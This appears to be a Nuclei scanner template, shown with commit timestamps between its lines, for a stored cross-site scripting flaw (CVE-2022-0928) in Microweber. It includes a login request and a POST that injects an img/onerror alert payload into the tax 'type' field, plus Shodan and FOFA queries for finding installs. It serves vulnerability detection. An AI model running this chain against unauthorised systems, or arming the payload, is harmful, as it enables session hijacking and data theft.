2022-08-14 12:03:29 +00:00
id : CVE-2022-0928
info :
2022-10-22 01:10:58 +00:00
name : Microweber < 1.2.12 - Stored Cross-Site Scripting
2022-08-14 12:03:29 +00:00
author : amit-jd
2022-09-16 20:03:07 +00:00
severity : medium
2022-08-14 12:03:29 +00:00
description : |
2022-09-16 19:50:10 +00:00
Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability via the Type parameter in the body of POST request, which is triggered by Add/Edit Tax.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade Microweber to version 1.2.12 or later to mitigate this vulnerability.
2022-08-14 12:03:29 +00:00
reference :
- https://huntr.dev/bounties/085aafdd-ba50-44c7-9650-fa573da29bcd
- https://github.com/microweber/microweber/commit/fc9137c031f7edec5f50d73b300919fb519c924a
- https://nvd.nist.gov/vuln/detail/CVE-2022-0928
2024-05-31 19:23:20 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
2022-08-14 12:03:29 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-0928
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2023-10-14 11:27:55 +00:00
epss-score : 0.00144
2024-05-31 19:23:20 +00:00
epss-percentile : 0.50194
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
2022-08-16 15:42:47 +00:00
metadata :
2022-10-22 01:10:58 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : microweber
product : microweber
2024-06-07 10:04:29 +00:00
shodan-query :
- http.favicon.hash:780351152
- http.html:"microweber"
fofa-query :
- body="microweber"
- icon_hash=780351152
2024-01-14 09:21:50 +00:00
tags : cve2022,cve,authenticated,huntr,xss,microweber,cms
2022-08-14 12:03:29 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-14 12:03:29 +00:00
- raw :
- |
POST /api/user_login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
username={{username}}&password={{password}}
- |
POST /api/shop/save_tax_item HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
2022-08-16 15:42:47 +00:00
Referer : {{BaseURL}}/admin/view:settings
2022-08-14 12:03:29 +00:00
id=0&name=vat1&type="><img+src%3dx+onerror%3dalert(document.domain)>&rate=10
2022-10-22 01:10:58 +00:00
- |
2022-08-16 15:42:47 +00:00
POST /module HTTP/1.1
2022-08-14 12:03:29 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
2022-08-16 15:42:47 +00:00
Referer:{{BaseURL}}/admin/view:settings
2022-08-14 12:03:29 +00:00
class=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes
matchers :
- type : dsl
dsl :
2022-10-22 01:10:58 +00:00
- 'contains(body_3,"<img src=x onerror=alert(document.domain)></td>")'
2023-06-19 21:10:30 +00:00
- 'contains(header_3,"text/html")'
2022-10-22 01:10:58 +00:00
- 'status_code_2 == 200 && status_code_3 == 200'
2022-08-14 12:39:27 +00:00
condition : and
2024-06-08 16:02:17 +00:00
# digest: 4a0a0047304502206e090977c24d875c8b6221bd8ed20bc0111fce3a0eb4b70117706d02dc21591002210099fe65d9c7e83e1d4a93f6e5ec4f1cbacb3fbe41deddb3d2805f76bdb837b12c:922c64590222798bb761d5b6d8e72950
